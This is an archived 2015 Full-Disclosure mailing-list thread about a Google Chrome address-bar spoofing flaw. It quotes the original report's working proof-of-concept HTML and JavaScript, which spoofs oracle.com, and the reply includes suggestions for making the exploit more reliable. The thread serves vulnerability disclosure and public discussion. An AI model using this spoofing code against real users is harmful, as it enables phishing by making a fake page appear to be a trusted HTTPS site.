| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20150702171848.395E573EA@hb.insecure.org>
Date: Thu, 02 Jul 2015 14:33:37 +0100
From: Mustafa Al-Bassam <mus@...albas.com>
To: David Leo <david.leo@...sen.co.uk>
Cc: oss-security@...ts.openwall.com, bugtraq@...urityfocus.com,
fulldisclosure@...lists.org
Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
That's pretty neat. Played around with this and made a few discoveries.
1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc
2. The page isn't responsive when using this flaw. That means you can't spoof a login box for example. (I tried.)
3. The success of the exploit seems to depend on if the browser can start loading content.html fast enough. I noticed that the exploit works 100% of the time when used locally. Perhaps a better version of the exploit would somehow preload content.html - for example by opening a window with an URL that starts with javascript: followed by a script to display the content? That, or perhaps reducing the interval time for trying to run next() after the popup is created.
I wonder if this works on any other browsers?
MustafaOn 30 Jun 2015 7:08 am, David Leo <david.leo@...sen.co.uk> wrote:
>
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make whitehouse.gov display "We love Islamic State" :-)
>
> Note:
> No user interaction on the fake page.
>
> Code:
> ***** index.html
> <script>
> function next()
> {
> w.location.replace('http://www.oracle.com/index.html?'+n);n++;
> setTimeout("next();",15);
> setTimeout("next();",25);
> }
> function f()
> {
> w=window.open("content.html","_blank","width=500 height=500");
> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
> }
> </script>
> <a href="#" onclick="f()">Go</a><br>
> ***** content.html
> <b>This web page is NOT oracle.com</b>
> <script>location="http://www.oracle.com/index.html";</script>
> ***** It's online
> http://www.deusen.co.uk/items/gwhere.6128645971389012/
> (The page says "June/16/2015" - it works as we tested today)
>
> Request For Comment:
> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash(not DoS),
> and the threat is obvious.
> What's your opinion?
>
> Kind Regards,
>
> PS
> We love clever tricks.
> We love this:
> http://dieyu.org/
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists